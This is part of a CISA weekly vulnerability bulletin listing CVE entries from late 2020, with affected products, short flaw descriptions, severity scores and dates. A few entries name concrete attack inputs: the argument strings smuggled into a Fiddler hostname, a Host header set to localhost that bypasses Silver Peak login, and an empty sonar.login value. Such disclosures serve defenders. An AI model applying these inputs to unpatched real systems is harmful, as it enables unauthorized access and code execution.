The Relish (Verve Connect) VH510 device with firmware before 1.0.1.6L0516 contains a buffer overflow within its web management portal. When a POST request is sent to /boaform/admin/formDOMAINBLK with a large blkDomain value, the Boa server crashes. 2020-11-04 not yet calculated CVE-2020-27690
MISC
MISC
rvtools — rvtools
 
RVToolsPasswordEncryption.exe in RVTools 4.0.6 allows users to encrypt passwords to be used in the configuration files. This encryption used a static IV and key, and thus using the Decrypt() method from VISKD.cs from the RVTools.exe executable allows for decrypting the encrypted passwords. The accounts used in the configuration files have access to vSphere instances. 2020-11-05 not yet calculated CVE-2020-27688
MISC
MISC
saltstack — salt
 
In SaltStack Salt through 3002, salt-netapi improperly validates eauth credentials and tokens. A user can bypass authentication and invoke Salt SSH. 2020-11-06 not yet calculated CVE-2020-25592
SUSE
MISC
FEDORA
CONFIRM
saltstack — salt
 
An issue was discovered in SaltStack Salt through 3002. Sending crafted web requests to the Salt API, with the SSH client enabled, can result in shell injection. 2020-11-06 not yet calculated CVE-2020-16846
SUSE
MISC
FEDORA
CONFIRM
saltstack — salt
 
The TLS module within SaltStack Salt through 3002 creates certificates with weak file permissions. 2020-11-06 not yet calculated CVE-2020-17490
SUSE
MISC
FEDORA
CONFIRM
servicestack — servicestack
 
ServiceStack before 5.9.2 mishandles JWT signature verification unless an application has a custom ValidateToken function that establishes a valid minimum length for a signature. 2020-11-02 not yet calculated CVE-2020-28042
MISC
MISC
MISC
MISC
shun_hu_technology — juuko_k-800
 
JUUKO K-800 (Firmware versions prior to numbers ending …9A, …9B, …9C, etc.) is vulnerable to a replay attack and command forgery, which could allow attackers to replay commands, control the device, view commands, or cause the device to stop running. 2020-11-02 not yet calculated CVE-2018-17932
MISC
shun_hu_technology — juuko_k-800
 
In JUUKO K-808, an attacker could specially craft a packet that encodes an arbitrary command, which could be executed on the K-808 (Firmware versions prior to numbers ending …9A, …9B, …9C, etc.). 2020-11-02 not yet calculated CVE-2018-19025
MISC
silver_peak — unity_orchestrator
 
In Silver Peak Unity Orchestrator versions prior to 8.9.11+, 8.10.11+, or 9.0.1+, an authenticated user can access, modify, and delete restricted files on the Orchestrator server using the/debugFiles REST API. 2020-11-05 not yet calculated CVE-2020-12146
MISC
silver_peak — unity_orchestrator
 
In Silver Peak Unity Orchestrator versions prior to 8.9.11+, 8.10.11+, or 9.0.1+, an authenticated user can make unauthorized MySQL queries against the Orchestrator database using the /sqlExecution REST API, which had been used for internal testing. 2020-11-05 not yet calculated CVE-2020-12147
MISC
silver_peak — unity_orchestrator
 
Silver Peak Unity Orchestrator versions prior to 8.9.11+, 8.10.11+, or 9.0.1+ uses HTTP headers to authenticate REST API calls from localhost. This makes it possible to log in to Orchestrator by introducing an HTTP HOST header set to 127.0.0.1 or localhost. Orchestrator instances that are hosted by customers –on-premise or in a public cloud provider –are affected by this vulnerability. 2020-11-05 not yet calculated CVE-2020-12145
MISC
sonarqube — sonarqube
 
In SonarQube 8.4.2.36762, an external attacker can achieve authentication bypass through SonarScanner. With an empty value for the -D sonar.login option, anonymous authentication is forced. This allows creating and overwriting public and private projects via the /api/ce/submit endpoint. 2020-11-02 not yet calculated CVE-2020-28002
MISC
studyplus — studyplus_app
 
Studyplus App for Android v6.3.7 and earlier and Studyplus App for iOS v8.29.0 and earlier use a hard-coded API key for an external service. By exploiting this vulnerability, API key for an external service may be obtained by analyzing data in the app. 2020-11-06 not yet calculated CVE-2020-5667
MISC
suitecrm — suitecrm
 
SuiteCRM before 7.11.17 is vulnerable to remote code execution via the system settings Log File Name setting. In certain circumstances involving admin account takeover, logger_file_name can refer to an attacker-controlled .php file under the web root. 2020-11-06 not yet calculated CVE-2020-28328
MISC
MISC
synk — absolunet/kafe
 
This affects the package @absolunet/kafe before 3.2.10. It allows cause a denial of service when validating crafted invalid emails. 2020-11-05 not yet calculated CVE-2020-7761
MISC
MISC
synk — browerless-chrome
 
This affects all versions of package browserless-chrome. User input flowing from the workspace endpoint gets used to create a file path filePath and this is fetched and then sent back to a user. This can be escaped to fetch arbitrary files from a server. 2020-11-02 not yet calculated CVE-2020-7758
MISC
MISC
MISC
synk — codemirror
 
This affects the package codemirror before 5.58.2; the package org.apache.marmotta.webjars:codemirror before 5.58.2. The vulnerable regular expression is located in https://github.com/codemirror/CodeMirror/blob/cdb228ac736369c685865b122b736cd0d397836c/mode/javascript/javascript.jsL129. The ReDOS vulnerability of the regex is mainly due to the sub-pattern (s|/*.*?*/)* 2020-10-30 not yet calculated CVE-2020-7760
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
synk — droppy
 
This affects all versions of package droppy. It is possible to traverse directories to fetch configuration files from a droopy server. 2020-11-02 not yet calculated CVE-2020-7757
MISC
MISC
synk — jsreport-chrome-pdf
 
This affects the package jsreport-chrome-pdf before 1.10.0. 2020-11-05 not yet calculated CVE-2020-7762
MISC
MISC
synk — phantom-html-to-pdf
 
This affects the package phantom-html-to-pdf before 0.6.1. 2020-11-05 not yet calculated CVE-2020-7763
MISC
MISC
synopsys — blackduck
 
Synopsys hub-rest-api-python (aka blackduck on PyPI) version 0.0.25 – 0.0.52 does not validate SSL certificates in certain cases. 2020-11-06 not yet calculated CVE-2020-27589
MISC
MISC
MISC
MISC
tcpdump — tcpdump
 
The ppp decapsulator in tcpdump 4.9.3 can be convinced to allocate a large amount of memory. 2020-11-04 not yet calculated CVE-2020-8037
MISC
tcpdump — tcpdump
 
The tok2strbuf() function in tcpdump 4.10.0-PRE-GIT was used by the SOME/IP dissector in an unsafe way. 2020-11-04 not yet calculated CVE-2020-8036
MISC
teler — teler
 
In teler before version 0.0.1, if you run teler inside a Docker container and encounter `errors.Exit` function, it will cause denial-of-service (`SIGSEGV`) because it doesn’t get process ID and process group ID of teler properly to kills. The issue is patched in teler 0.0.1 and 0.0.1-dev5.1. 2020-11-06 not yet calculated CVE-2020-26213
MISC
CONFIRM
telerik — fiddler
 
Telerik Fiddler through 5.0.20202.18177 allows attackers to execute arbitrary programs via a hostname with a trailing space character, followed by –utility-and-browser –utility-cmd-prefix= and the pathname of a locally installed program. The victim must interactively choose the Open On Browser option. Fixed in version 5.0.20204. 2020-11-05 not yet calculated CVE-2020-13661
MISC
MISC
MISC
tmux — tmux
 
The function input_csi_dispatch_sgr_colon() in file input.c contained a stack-based buffer-overflow that can be exploited by terminal output. 2020-11-06 not yet calculated CVE-2020-27347
MISC
MISC
ubiquiti — unifi_protect_controller
 
A security issue was found in UniFi Protect controller v1.14.10 and earlier.The authentication in the UniFi Protect controller API was using “x-token” improperly, allowing attackers to use the API to send authenticated messages without a valid token.This vulnerability was fixed in UniFi Protect v1.14.11 and newer.This issue does not impact UniFi Cloud Key Gen 2 plus.This issue does not impact UDM-Pro customers with UniFi Protect stopped.Affected Products:UDM-Pro firmware 1.7.2 and earlier.UNVR firmware 1.3.12 and earlier.Mitigation:Update UniFi Protect to v1.14.11 or newer version; the UniFi Protect controller can be updated through your UniFi OS settings.Alternatively, you can update UNVR and UDM-Pro to:- UNVR firmware to 1.3.15 or newer.- UDM-Pro firmware to 1.8.0 or newer. 2020-11-05 not yet calculated CVE-2020-8267
MISC
MISC
MISC
ubuntu — libvirt
 
Ubuntu’s packaging of libvirt in 20.04 LTS created a control socket with world read and write permissions. An attacker could use this to overwrite arbitrary files or execute arbitrary code. 2020-11-06 not yet calculated CVE-2020-15708
MISC
ubuntu — packagekit
 
PackageKit provided detailed error messages to unprivileged callers that exposed information about file presence and mimetype of files that the user would be unable to determine on its own. 2020-11-07 not yet calculated CVE-2020-16121
CONFIRM
MISC
ubuntu — packagekit
 
PackageKit’s apt backend mistakenly treated all local debs as trusted. The apt security model is based on repository trust and not on the contents of individual files. On sites with configured PolicyKit rules this may allow users to install malicious packages. 2020-11-07 not yet calculated CVE-2020-16122
CONFIRM
ubuntu — ubuntu
 
There is no input validation on the Locale property in an apt transaction. An unprivileged user can supply a full path to a writable directory, which lets aptd read a file as root. Having a symlink in place results in an error message if the file exists, and no error otherwise. This way an unprivileged user can check for the existence of any files on the system as root. 2020-10-31 not yet calculated CVE-2020-15703
CONFIRM
MISC
unix — symbolic_link
 
UNIX Symbolic Link (Symlink) Following in TP-Link Archer A7(US)_V5_200721 allows an authenticated admin user, with physical access and network access, to execute arbitrary code after plugging a crafted USB drive into the router. 2020-11-06 not yet calculated CVE-2020-5795
MISC
vmware — tanzu
 
Single Sign-On for Vmware Tanzu all versions prior to 1.11.3 ,1.12.x versions prior to 1.12.4 and 1.13.x prior to 1.13.1 are vulnerable to user impersonation attack.If two users are logged in to the SSO operator dashboard at the same time, with the same username, from two different identity providers, one can acquire the token of the other and thus operate with their permissions. Note: Foundation may be vulnerable only if: 1) The system zone is set up to use a SAML identity provider 2) There are internal users that have the same username as users in the external SAML provider 3) Those duplicate-named users have the scope to access the SSO operator dashboard 4) The vulnerability doesn’t appear with LDAP because of chained authentication. 2020-10-31 not yet calculated CVE-2020-5425
CONFIRM
whatsapp — whatsapp_and_whatsapp_business
 
Improper authorization of the Screen Lock feature in WhatsApp and WhatsApp Business for iOS prior to v2.20.100 could have permitted use of Siri to interact with the WhatsApp application even after the phone was locked. 2020-11-03 not yet calculated CVE-2020-1908
CONFIRM
wildfly — wildfly
 
A memory leak flaw was found in WildFly in all versions up to 21.0.0.Final, where host-controller tries to reconnect in a loop, generating new connections which are not properly closed while not able to connect to domain-controller. This flaw allows an attacker to cause an Out of memory (OOM) issue, leading to a denial of service. The highest threat from this vulnerability is to system availability. 2020-11-02 not yet calculated CVE-2020-25689
CONFIRM
wireshark — wireshark
 
In Wireshark 3.2.0 to 3.2.7, the GQUIC dissector could crash. This was addressed in epan/dissectors/packet-gquic.c by correcting the implementation of offset advancement. 2020-11-02 not yet calculated CVE-2020-28030
MISC
MISC
MISC
wondershare — dr.fone
 
Dr.Fone 3.0.0 allows local users to gain privileges via a Trojan horse DriverInstall.exe because %PROGRAMFILES(X86)%Wondersharedr.foneLibraryDriverInstaller has Full Control for BUILTINUsers. 2020-11-02 not yet calculated CVE-2020-27992
MISC
MISC
wordpress — wordpress Import and export users and customers WordPress Plugin through 1.15.5.11 allows CSV injection via a customer’s profile. 2020-11-04 not yet calculated CVE-2020-22277
MISC
MISC
MISC
wordpress — wordpress
 
The usc-e-shop (aka Collne Welcart e-Commerce) plugin before 1.9.36 for WordPress allows Object Injection because of usces_unserialize. There is not a complete POP chain. 2020-11-07 not yet calculated CVE-2020-28339
MISC
MISC
wordpress — wordpress
 
WeForms WordPress Plugin 1.4.7 allows CSV injection via a form’s entry. 2020-11-04 not yet calculated CVE-2020-22276
MISC
MISC
MISC
wordpress — wordpress
 
Easy Registration Forms (ER Forms) WordPress Plugin 2.0.6 allows an attacker to submit an entry with malicious CSV commands. After that, when the system administrator generates CSV output from the forms information, there is no check on this inputs and the codes are executable. 2020-11-04 not yet calculated CVE-2020-22275
MISC
MISC
MISC

Back to top

This product is provided subject to this Notification and this Privacy & Use policy.

Categories
alerts

Vulnerability Summary for the Week of October 26, 2020

Original release date: November 2, 2020

The CISA Weekly Vulnerability Summary Bulletin is created using information from the NIST NVD. In some cases, the vulnerabilities in the Bulletin may not yet have assigned CVSS scores. Please visit NVD for updated vulnerability entries, which include CVSS scores once they are available.

 

High Vulnerabilities

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
apple — airport_base_station_firmware An out-of-bounds read was addressed with improved input validation. This issue is fixed in AirPort Base Station Firmware Update 7.8.1, AirPort Base Station Firmware Update 7.9.1. A remote attacker may be able to leak memory. 2020-10-27 7.5 CVE-2019-8581
MISC
MISC
apple — airport_base_station_firmware A use after free issue was addressed with improved memory management. This issue is fixed in AirPort Base Station Firmware Update 7.8.1, AirPort Base Station Firmware Update 7.9.1. A remote attacker may be able to cause arbitrary code execution. 2020-10-27 7.5 CVE-2019-8578
MISC
MISC
apple — airport_base_station_firmware A null pointer dereference was addressed with improved input validation. This issue is fixed in AirPort Base Station Firmware Update 7.8.1, AirPort Base Station Firmware Update 7.9.1. A remote attacker may be able to cause arbitrary code execution. 2020-10-27 7.5 CVE-2019-8572
MISC
MISC
apple — airport_base_station_firmware A null pointer dereference was addressed with improved input validation. This issue is fixed in AirPort Base Station Firmware Update 7.8.1, AirPort Base Station Firmware Update 7.9.1. A remote attacker may be able to cause a system denial of service. 2020-10-27 7.8 CVE-2019-8588
MISC
MISC
apple — icloud An out-of-bounds read was addressed with improved input validation. This issue is fixed in macOS Catalina 10.15, iOS 13, iCloud for Windows 7.14, iCloud for Windows 10.7, tvOS 13, macOS Catalina 10.15.1, Security Update 2019-001, and Security Update 2019-006, watchOS 6, iTunes 12.10.1 for Windows. A remote attacker may be able to cause unexpected application termination or arbitrary code execution. 2020-10-27 7.5 CVE-2019-8746
MISC
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — icloud Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in tvOS 13.3, iCloud for Windows 10.9, iOS 13.3 and iPadOS 13.3, Safari 13.0.4, iTunes 12.10.3 for Windows, iCloud for Windows 7.16. Processing maliciously crafted web content may lead to arbitrary code execution. 2020-10-27 9.3 CVE-2019-8835
MISC
MISC
MISC
MISC
MISC
MISC
apple — icloud Multiple memory corruption issues were addressed with improved input validation. This issue is fixed in macOS Catalina 10.15, iOS 13, iCloud for Windows 7.14, iCloud for Windows 10.7, tvOS 13, macOS Catalina 10.15.1, Security Update 2019-001, and Security Update 2019-006, watchOS 6, iTunes 12.10.1 for Windows. Multiple issues in libxml2. 2020-10-27 7.5 CVE-2019-8749
MISC
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — icloud Multiple memory corruption issues were addressed with improved input validation. This issue is fixed in macOS Catalina 10.15, iOS 13, iCloud for Windows 7.14, iCloud for Windows 10.7, tvOS 13, macOS Catalina 10.15.1, Security Update 2019-001, and Security Update 2019-006, watchOS 6, iTunes 12.10.1 for Windows. Multiple issues in libxml2. 2020-10-27 7.5 CVE-2019-8756
MISC
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — icloud Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in tvOS 13.3, watchOS 6.1.1, iCloud for Windows 10.9, iOS 13.3 and iPadOS 13.3, Safari 13.0.4, iTunes 12.10.3 for Windows, iCloud for Windows 7.16. Processing maliciously crafted web content may lead to arbitrary code execution. 2020-10-27 9.3 CVE-2019-8844
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — icloud A logic issue was addressed with improved validation. This issue is fixed in iCloud for Windows 7.17, iTunes 12.10.4 for Windows, iCloud for Windows 10.9.2, tvOS 13.3.1, Safari 13.0.5, iOS 13.3.1 and iPadOS 13.3.1. A DOM object context may not have had a unique security origin. 2020-10-27 7.2 CVE-2020-3864
MISC
MISC
MISC
MISC
MISC
MISC
apple — icloud A use after free issue was addressed with improved memory management. This issue is fixed in tvOS 13.3, iCloud for Windows 10.9, iOS 13.3 and iPadOS 13.3, Safari 13.0.4, iTunes 12.10.3 for Windows, iCloud for Windows 7.16. Processing maliciously crafted web content may lead to arbitrary code execution. 2020-10-27 9.3 CVE-2019-8846
MISC
MISC
MISC
MISC
MISC
MISC
apple — ipad_os A memory corruption vulnerability was addressed with improved locking. This issue is fixed in iOS 13.1 and iPadOS 13.1, watchOS 6, tvOS 13. An application may be able to execute arbitrary code with kernel privileges. 2020-10-27 9.3 CVE-2019-8740
MISC
MISC
MISC
apple — ipados An out-of-bounds read was addressed with improved input validation. This issue is fixed in tvOS 13.3, watchOS 6.1.1, macOS Catalina 10.15.2, Security Update 2019-002 Mojave, and Security Update 2019-007 High Sierra, iOS 13.3 and iPadOS 13.3, iOS 12.4.4, watchOS 5.3.4. Processing malicious video via FaceTime may lead to arbitrary code execution. 2020-10-27 9.3 CVE-2019-8830
MISC
MISC
MISC
MISC
MISC
MISC
apple — ipados A memory corruption issue was addressed with improved memory handling. This issue is fixed in iOS 13.3 and iPadOS 13.3, watchOS 6.1.1, macOS Catalina 10.15.2, Security Update 2019-002 Mojave, and Security Update 2019-007 High Sierra, tvOS 13.3. An application may be able to execute arbitrary code with kernel privileges. 2020-10-27 9.3 CVE-2019-8828
MISC
MISC
MISC
MISC
apple — ipados An information disclosure issue was addressed by removing the vulnerable code. This issue is fixed in iOS 13.3 and iPadOS 13.3. An application may be able to execute arbitrary code with kernel privileges. 2020-10-27 7.2 CVE-2019-8841
MISC
apple — ipados An out-of-bounds read was addressed with improved input validation. This issue is fixed in watchOS 6.1.2, iOS 13.3.1 and iPadOS 13.3.1, tvOS 13.3.1, macOS Catalina 10.15.3, Security Update 2020-001 Mojave, Security Update 2020-001 High Sierra. Processing a maliciously crafted image may lead to arbitrary code execution. 2020-10-27 9.3 CVE-2020-3880
MISC
MISC
MISC
MISC
apple — ipados A memory corruption vulnerability was addressed with improved locking. This issue is fixed in macOS Catalina 10.15.1, Security Update 2019-001, and Security Update 2019-006, watchOS 6.1, tvOS 13.2, iOS 13.2 and iPadOS 13.2. An application may be able to execute arbitrary code with kernel privileges. 2020-10-27 9.3 CVE-2019-8829
MISC
MISC
MISC
MISC
apple — ipados A memory corruption issue was addressed with improved memory handling. This issue is fixed in iOS 13.3 and iPadOS 13.3, watchOS 6.1.1, macOS Catalina 10.15.2, Security Update 2019-002 Mojave, and Security Update 2019-007 High Sierra, tvOS 13.3. An application may be able to execute arbitrary code with kernel privileges. 2020-10-27 9.3 CVE-2019-8838
MISC
MISC
MISC
MISC
apple — ipados An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Catalina 10.15.7, Security Update 2020-005 High Sierra, Security Update 2020-005 Mojave, iOS 14.0 and iPadOS 14.0. Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution. 2020-10-27 9.3 CVE-2020-9973
MISC
MISC
apple — ipados A memory corruption issue was addressed with improved memory handling. This issue is fixed in iOS 13.3 and iPadOS 13.3, watchOS 6.1.1, macOS Catalina 10.15.2, Security Update 2019-002 Mojave, and Security Update 2019-007 High Sierra, tvOS 13.3. An application may be able to execute arbitrary code with system privileges. 2020-10-27 9.3 CVE-2019-8832
MISC
MISC
MISC
MISC
apple — ipados A memory corruption issue was addressed with improved memory handling. This issue is fixed in macOS Catalina 10.15, iOS 13.1 and iPadOS 13.1, tvOS 13, macOS Catalina 10.15.1, Security Update 2019-001, and Security Update 2019-006, watchOS 6. An application may be able to execute arbitrary code with system privileges. 2020-10-27 9.3 CVE-2019-8831
MISC
MISC
MISC
MISC
MISC
apple — ipados A memory corruption issue was addressed with improved memory handling. This issue is fixed in watchOS 6.1.2, iOS 13.3.1 and iPadOS 13.3.1, tvOS 13.3.1. An application may be able to execute arbitrary code with kernel privileges. 2020-10-27 9.3 CVE-2019-8836
MISC
MISC
MISC
apple — ipados A memory corruption issue was addressed by removing the vulnerable code. This issue is fixed in iOS 13.3 and iPadOS 13.3, watchOS 6.1.1, macOS Catalina 10.15.2, Security Update 2019-002 Mojave, and Security Update 2019-007 High Sierra, tvOS 13.3. An application may be able to execute arbitrary code with kernel privileges. 2020-10-27 9.3 CVE-2019-8833
MISC
MISC
MISC
MISC
apple — iphone_os An input validation issue was addressed with improved input validation. This issue is fixed in macOS Mojave 10.14.5, Security Update 2019-003 High Sierra, Security Update 2019-003 Sierra, iOS 12.3, watchOS 5.2.1. A remote attacker may be able to cause a system denial of service. 2020-10-27 7.8 CVE-2019-8573
MISC
MISC
MISC
apple — iphone_os A memory corruption issue was addressed with improved memory handling. This issue is fixed in watchOS 6, iOS 13, tvOS 13. An application may be able to execute arbitrary code with kernel privileges. 2020-10-27 9.3 CVE-2019-8718
MISC
MISC
MISC
apple — iphone_os A memory corruption issue was addressed with improved state management. This issue is fixed in macOS Catalina 10.15, tvOS 13, macOS Catalina 10.15.1, Security Update 2019-001, and Security Update 2019-006, watchOS 6, iOS 13. An application may be able to execute arbitrary code with kernel privileges. 2020-10-27 9.3 CVE-2019-8709
MISC
MISC
MISC
MISC
MISC
apple — iphone_os The issue was addressed with improved permissions logic. This issue is fixed in iOS 13.1 and iPadOS 13.1, tvOS 13. A malicious application may be able to determine kernel memory layout. 2020-10-27 7.1 CVE-2019-8780
MISC
MISC
apple — iphone_os A memory corruption issue was addressed with improved memory handling. This issue is fixed in macOS Catalina 10.15.1, Security Update 2019-001, and Security Update 2019-006, macOS Catalina 10.15, iOS 13. An application may be able to execute arbitrary code with system privileges. 2020-10-27 9.3 CVE-2019-8715
MISC
MISC
MISC
apple — iphone_os A use after free issue was addressed with improved memory management. This issue is fixed in watchOS 5.2, macOS Mojave 10.14.4, Security Update 2019-002 High Sierra, Security Update 2019-002 Sierra, iOS 12.2. An application may be able to execute arbitrary code with kernel privileges. 2020-10-27 7.2 CVE-2019-8528
MISC
MISC
MISC
apple — iphone_os An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed with improved input validation. This issue is fixed in macOS Mojave 10.14.5, Security Update 2019-003 High Sierra, Security Update 2019-003 Sierra, watchOS 5.2, macOS Mojave 10.14.4, Security Update 2019-002 High Sierra, Security Update 2019-002 Sierra, iOS 12.2. A remote attacker may be able to leak memory. 2020-10-27 7.5 CVE-2019-8547
MISC
MISC
MISC
MISC
apple — iphone_os A validation issue existed in Trust Anchor Management. This issue was addressed with improved validation. This issue is fixed in watchOS 5.2, macOS Mojave 10.14.4, Security Update 2019-002 High Sierra, Security Update 2019-002 Sierra, iOS 12.2. An untrusted radius server certificate may be trusted. 2020-10-27 7.5 CVE-2019-8531
MISC
MISC
MISC
apple — iphone_os A memory corruption issue was addressed with improved memory handling. This issue is fixed in watchOS 6, iOS 13, tvOS 13. An application may be able to execute arbitrary code with system privileges. 2020-10-27 10 CVE-2019-8712
MISC
MISC
MISC
apple — iphone_os The issue was addressed with improved validation on the FaceTime server. This issue is fixed in macOS Mojave 10.14.3 Supplemental Update, iOS 12.1.4. A thorough security audit of the FaceTime service uncovered an issue with Live Photos . 2020-10-27 7.5 CVE-2019-7288
MISC
MISC
apple — iphone_os A memory corruption issue was addressed with improved state management. This issue is fixed in macOS Mojave 10.14.5, Security Update 2019-003 High Sierra, Security Update 2019-003 Sierra, watchOS 5.2, macOS Mojave 10.14.4, Security Update 2019-002 High Sierra, Security Update 2019-002 Sierra, iOS 12.2. An application may be able to execute arbitrary code with kernel privileges. 2020-10-27 7.2 CVE-2019-8525
MISC
MISC
MISC
MISC
apple — mac_os_x A memory corruption issue was addressed with improved memory handling. This issue is fixed in macOS Catalina 10.15.1, Security Update 2019-001, and Security Update 2019-006. An application may be able to execute arbitrary code with system privileges. 2020-10-27 10 CVE-2019-8716
MISC
apple — mac_os_x A logic issue was addressed with improved restrictions. This issue is fixed in macOS Catalina 10.15.2, Security Update 2019-002 Mojave, and Security Update 2019-007 High Sierra. A malicious application may be able to access restricted files. 2020-10-27 9.3 CVE-2019-8837
MISC
apple — mac_os_x A memory corruption issue was addressed with improved memory handling. This issue is fixed in macOS Catalina 10.15.2, Security Update 2019-002 Mojave, and Security Update 2019-007 High Sierra. An application may be able to execute arbitrary code with kernel privileges. 2020-10-27 9.3 CVE-2019-8852
MISC
apple — mac_os_x A memory corruption issue was addressed with improved memory handling. This issue is fixed in macOS Catalina 10.15.2, Security Update 2019-002 Mojave, and Security Update 2019-007 High Sierra. An application may be able to execute arbitrary code with kernel privileges. 2020-10-27 9.3 CVE-2019-8847
MISC
apple — mac_os_x A memory corruption issue was addressed with improved state management. This issue is fixed in macOS Catalina 10.15.1, Security Update 2019-001, and Security Update 2019-006. An application may be able to execute arbitrary code with kernel privileges. 2020-10-27 9.3 CVE-2019-8824
MISC
apple — mac_os_x A memory corruption issue was addressed with improved memory handling. This issue is fixed in macOS Catalina 10.15.3, Security Update 2020-001 Mojave, Security Update 2020-001 High Sierra. An application may be able to execute arbitrary code with system privileges. 2020-10-27 9.3 CVE-2020-3863
MISC
apple — mac_os_x A memory consumption issue was addressed with improved memory handling. This issue is fixed in macOS Catalina 10.15.1, Security Update 2019-001, and Security Update 2019-006, macOS Catalina 10.15. Processing a maliciously crafted string may lead to heap corruption. 2020-10-27 7.5 CVE-2019-8767
MISC
MISC
apple — mac_os_x A buffer overflow was addressed with improved bounds checking. This issue is fixed in macOS Catalina 10.15.6, Security Update 2020-004 Mojave, Security Update 2020-004 High Sierra. A buffer overflow may result in arbitrary code execution. 2020-10-27 7.5 CVE-2020-9866
MISC
apple — mac_os_x A memory initialization issue was addressed with improved memory handling. This issue is fixed in macOS Mojave 10.14.6, Security Update 2019-004 High Sierra, Security Update 2019-004 Sierra. A malicious application may be able to execute arbitrary code with system privileges. 2020-10-27 9.3 CVE-2019-8539
MISC
apple — mac_os_x A memory consumption issue was addressed with improved memory handling. This issue is fixed in macOS Mojave 10.14.3, Security Update 2019-001 High Sierra, Security Update 2019-001 Sierra, macOS Mojave 10.14.2, Security Update 2018-003 High Sierra, Security Update 2018-006 Sierra. A malicious application may be able to execute arbitrary code with system privileges. 2020-10-27 9.3 CVE-2018-4452
MISC
MISC
apple — mac_os_x A logic issue existed resulting in memory corruption. This was addressed with improved state management. This issue is fixed in macOS Mojave 10.14.4, Security Update 2019-002 High Sierra, Security Update 2019-002 Sierra. A malicious application may be able to execute arbitrary code with kernel privileges. 2020-10-27 7.2 CVE-2019-8534
MISC
apple — mac_os_x This issue is fixed in macOS Mojave 10.14. A memory corruption issue was addressed with improved input validation. 2020-10-27 9.3 CVE-2018-4451
MISC
apple — mac_os_x A memory corruption issue was addressed with improved memory handling. This issue is fixed in macOS Catalina 10.15. An application may be able to execute arbitrary code with system privileges. 2020-10-27 9.3 CVE-2019-8776
MISC
arubanetworks — airwave_glass A remote unauthorized access vulnerability was discovered in Aruba Airwave Software version(s): Prior to 1.3.2. 2020-10-26 7.5 CVE-2020-7124
MISC
arubanetworks — airwave_glass A remote execution of arbitrary commands vulnerability was discovered in Aruba Airwave Software version(s): Prior to 1.3.2. 2020-10-26 9 CVE-2020-24631
MISC
arubanetworks — airwave_glass A remote execution of arbitrary commandss vulnerability was discovered in Aruba Airwave Software version(s): Prior to 1.3.2. 2020-10-26 9 CVE-2020-24632
MISC
arubanetworks — airwave_glass A remote unauthenticated arbitrary code execution vulnerability was discovered in Aruba Airwave Software version(s): Prior to 1.3.2. 2020-10-26 7.5 CVE-2020-7127
MISC
crmeb — crmeb A SSRF vulnerability exists in the downloadimage interface of CRMEB 3.0, which can remotely download arbitrary files on the server and remotely execute arbitrary code. 2020-10-23 7.5 CVE-2020-25466
MISC
MISC
MISC
fruitywifi_project — fruitywifi FruityWifi through 2.4 has an unsafe Sudo configuration [(ALL : ALL) NOPASSWD: ALL]. This allows an attacker to perform a system-level (root) local privilege escalation, allowing an attacker to gain complete persistent access to the local system. 2020-10-23 7.2 CVE-2020-24848
MISC
getgophish — gophish Gophish before 0.11.0 allows the creation of CSV sheets that contain malicious content. 2020-10-28 9.3 CVE-2020-24707
MISC
MISC
MISC
ibm — i2_analysts_notebook IBM i2 Analyst Notebook 9.2.0 and 9.2.1 could allow a local attacker to execute arbitrary code on the system, caused by a memory corruption. By persuading a victim to open a specially-crafted file, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 187868. 2020-10-29 9.3 CVE-2020-4721
XF
CONFIRM
ibm — i2_analysts_notebook IBM i2 Analyst Notebook 9.2.0 and 9.2.1 could allow a local attacker to execute arbitrary code on the system, caused by a memory corruption. By persuading a victim to open a specially-crafted file, an attacker could exploit this vulnerability to execute arbitrary code on the system. 2020-10-29 9.3 CVE-2020-4724
XF
CONFIRM
ibm — i2_analysts_notebook IBM i2 Analyst Notebook 9.2.0 and 9.2.1 could allow a local attacker to execute arbitrary code on the system, caused by a memory corruption. By persuading a victim to open a specially-crafted file, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 187870. 2020-10-29 9.3 CVE-2020-4722
XF
CONFIRM
ibm — i2_analysts_notebook IBM i2 Analyst Notebook 9.2.0 and 9.2.1 could allow a local attacker to execute arbitrary code on the system, caused by a memory corruption. By persuading a victim to open a specially-crafted file, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 187873. 2020-10-29 9.3 CVE-2020-4723
XF
CONFIRM
illumos — illumos An issue was discovered in illumos before 2020-10-22, as used in OmniOS before r151030by, r151032ay, and r151034y and SmartOS before 20201022. There is a buffer overflow in parse_user_name in lib/libpam/pam_framework.c. 2020-10-26 7.5 CVE-2020-27678
MISC
kde — partition_manager An issue was discovered in KDE Partition Manager 4.1.0 before 4.2.0. The kpmcore_externalcommand helper contains a logic flaw in which the service invoking D-Bus is not properly checked. An attacker on the local machine can replace /etc/fstab, and execute mount and other partitioning related commands, while KDE Partition Manager is running. the mount command can then be used to gain full root privileges. 2020-10-26 7.2 CVE-2020-27187
MISC
MISC
CONFIRM
konzept-ix — publixone A RemoteFunctions endpoint with missing access control in konzept-ix publiXone before 2020.015 allows attackers to disclose sensitive user information, send arbitrary e-mails, escalate the privileges of arbitrary user accounts, and have unspecified other impact. 2020-10-27 7.5 CVE-2020-27183
MISC
MISC
oscommerce — oscommerce osCommerce Phoenix CE before 1.0.5.4 allows OS command injection remotely. Within admin/mail.php, a from POST parameter can be passed to the application. This affects the PHP mail function, and the sendmail -f option. 2020-10-28 10 CVE-2020-27976
MISC

Back to top

 

Medium Vulnerabilities

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
1password — command-line An issue was discovered in beta versions of the 1Password command-line tool prior to 0.5.5 and in beta versions of the 1Password SCIM bridge prior to 0.7.3. An insecure random number generator was used to generate various keys. An attacker with access to the user’s encrypted data may be able to perform brute-force calculations of encryption keys and thus succeed at decryption. 2020-10-27 5 CVE-2020-10256
MISC
CONFIRM
MISC
